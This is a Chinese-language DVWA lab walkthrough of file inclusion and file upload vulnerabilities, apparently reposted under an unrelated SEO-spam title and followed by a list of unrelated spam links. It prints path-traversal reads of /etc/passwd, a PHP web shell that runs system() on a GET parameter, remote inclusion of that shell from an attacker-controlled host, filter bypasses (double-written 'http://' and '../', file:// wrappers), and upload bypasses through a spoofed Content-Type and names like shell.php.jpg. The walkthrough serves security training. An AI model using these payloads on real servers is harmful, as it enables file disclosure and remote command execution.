当前位置: 首页 > news >正文

东莞网站建设培训学校怎么做神马搜索排名seo

news 2025/7/10 16:28:37
东莞网站建设培训学校,怎么做神马搜索排名seo,wordpress变为中文,上海网络维护培训班文件包含 本地文件包含(敏感信息泄露)和远程文件包含(命令执行) 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行,如包含黑客vps的…

文件包含

本地文件包含(敏感信息泄露)和远程文件包含(命令执行)

  • 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等

  • 远程文件包含能使得服务器代码执行,如包含黑客vps的http://192.168.72.162:8000/shell.php文件,而文件内容如下:<?php system('whoami')?>

测试环境

本地文件包含不用什么测试环境,只要有个文件,就能知道其是否触发,远程文件包含需要我们写个php代码,如下

<?php
echo "this is the remote file"."\n";
system($_GET['a']);
?>

然后python -m http.server 开个服务器,让dvwa能包含我们的php代码

easy

  • linux服务下的本地文件包含

../../../../../../etc/passwd

  • windows服务下的本地文件包含

我的php网站部署在F盘,在F盘下放一个test.txt
​
../../../../../../test.txt能将文件读出
或者直接绝对路径:
​
C:/Windows/system.ini

  • 远程文件包含

http://www.oswe.com/dvwa/vulnerabilities/fi/?page=http://192.168.72.162:8000/shell.php&a=whoami
​
访问成功如下图:

 

medium
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
​
方法1:
直接输入绝对路径
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=F:/test.txt
正常输出
​
方法2:双写绕过
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=
..././..././..././..././..././..././..././..././test.txt
​
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.72.162:8000/shell.php&a=whoami
high
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
上面的逻辑是,如果参数没有file字符串,且不是include.php,直接过滤,所以这个情况不能使用远程文件包含了
我们通过伪协议file bypass
​
page=file:///C:/Windows/system.ini或
page=file:///../../../../../../../../test.txt
impossible
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
后台只允许包含这4个文件

文件上传

文件上传只有medium、high、impossible三种难度

准备个php脚本

<?php
system($_GET['a']);
?>
medium
检测:请求头
​
抓包,修改数据包,直接过
Content-Type: image/jpeg
high
检测:后缀是否为jpg、jpeg、png
​
上传
shell.php.jpg或shell.php.png都能被解析为php文件(总感觉哪里很怪)

 

impossible
imagecreatefrompng
imagecreatefromjpeg
由文件或url创建一个新图像,如果解析图像失败会报错
​
上传的文件会成为md5值.png或md5值.jpg的形式,web服务器不会将其解析为php文件
http://www.hrbkazy.com/news/21746.html

相关文章:

  • 网站测试毕设代做苏州百度快速排名优化
  • 网站建设服务的风险seo长尾关键词优化
  • 金沙网站怎么做代理最新疫情新闻100字
  • 专业的网站建设设计价格怎么做一个免费的网站
  • 南宁网约车司机真实收入seo研究中心vip教程
  • 外链网站 风险青岛运营网络推广业务
  • 自助建站系统注册深圳seo优化排名优化
  • 姓名域名网站打开百度网页
  • 网站建设手机端官网群排名优化软件
  • 关键词诊断优化全部关键词常用的seo网站优化排名
  • 北京网站推广外包自媒体平台排名
  • php和python百度官方优化指南
  • 做一个论坛网站要多少钱苏州做网站的专业公司
  • seo工资水平北京seo关键词优化外包
  • 做婚介网站最新的域名网站
  • 维度网络做网站网络运营课程培训班
  • 在哪个网站上做蓝思测评南昌seo推广公司
  • 网站建设与管理考试题云盘搜索
  • 钦州建设银行社招聘网站百度广告价格
  • 学做网站赚钱方法夫唯老师seo
  • 手机网站建立教程网络推广有多少种方法
  • 专门做网站开发的公司郑州百度seo网站优化
  • 在哪网站建设上海seo关键词优化
  • 免费制作头像网站优化系统
  • 网站建设情况调查表论坛排名
  • wordpress 添加自定义小工具刷关键词排名seo软件
  • 思睿鸿途北京网站建设百度扫一扫识别图片在线
  • 北京网站手机站建设公司电话seo sem优化
  • 个人做网站开发网络营销的宏观环境
  • 城市房产网优化器